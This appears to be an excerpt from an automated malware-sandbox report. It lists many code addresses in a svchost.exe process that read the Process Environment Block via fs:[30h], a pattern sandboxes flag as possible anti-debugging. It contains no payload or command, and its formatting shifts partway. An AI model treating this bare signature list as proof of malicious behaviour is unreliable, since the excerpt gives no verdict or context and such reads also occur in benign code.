                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] (12 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C280A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h] (8 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2A020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2C020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC6030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB07C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD678E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C307AF mov eax, dword ptr fs:[00000030h]1_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE47A0 mov eax, dword ptr fs:[00000030h]1_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov esi, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30750 mov eax, dword ptr fs:[00000030h]1_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE75D mov eax, dword ptr fs:[00000030h]1_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4755 mov eax, dword ptr fs:[00000030h]1_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38770 mov eax, dword ptr fs:[00000030h]1_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C700 mov eax, dword ptr fs:[00000030h]1_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30710 mov eax, dword ptr fs:[00000030h]1_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60710 mov eax, dword ptr fs:[00000030h]1_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov ecx, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC730 mov eax, dword ptr fs:[00000030h]1_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C666B0 mov eax, dword ptr fs:[00000030h]1_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4C640 mov eax, dword ptr fs:[00000030h]1_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C62674 mov eax, dword ptr fs:[00000030h]1_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE609 mov eax, dword ptr fs:[00000030h]1_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72619 mov eax, dword ptr fs:[00000030h]1_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E627 mov eax, dword ptr fs:[00000030h]1_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C66620 mov eax, dword ptr fs:[00000030h]1_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68620 mov eax, dword ptr fs:[00000030h]1_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3262C mov eax, dword ptr fs:[00000030h]1_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C365D0 mov eax, dword ptr fs:[00000030h]1_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C325E0 mov eax, dword ptr fs:[00000030h]1_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov eax, dword ptr fs:[00000030h]1_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov ecx, dword ptr fs:[00000030h]1_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64588 mov eax, dword ptr fs:[00000030h]1_2_03C64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E59C mov eax, dword ptr fs:[00000030h]1_2_03C6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6500 mov eax, dword ptr fs:[00000030h]1_2_03CC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C304E5 mov ecx, dword ptr fs:[00000030h]1_2_03C304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA49A mov eax, dword ptr fs:[00000030h]1_2_03CEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C364AB mov eax, dword ptr fs:[00000030h]1_2_03C364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C644B0 mov ecx, dword ptr fs:[00000030h]1_2_03C644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]1_2_03CBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA456 mov eax, dword ptr fs:[00000030h]1_2_03CEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2645D mov eax, dword ptr fs:[00000030h]1_2_03C2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5245A mov eax, dword ptr fs:[00000030h]1_2_03C5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC460 mov ecx, dword ptr fs:[00000030h]1_2_03CBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C427 mov eax, dword ptr fs:[00000030h]1_2_03C2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]1_2_03CDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EBFC mov eax, dword ptr fs:[00000030h]1_2_03C5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]1_2_03CBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]1_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]1_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]1_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]1_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]1_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]1_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFAB40 mov eax, dword ptr fs:[00000030h]1_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8B42 mov eax, dword ptr fs:[00000030h]1_2_03CD8B42
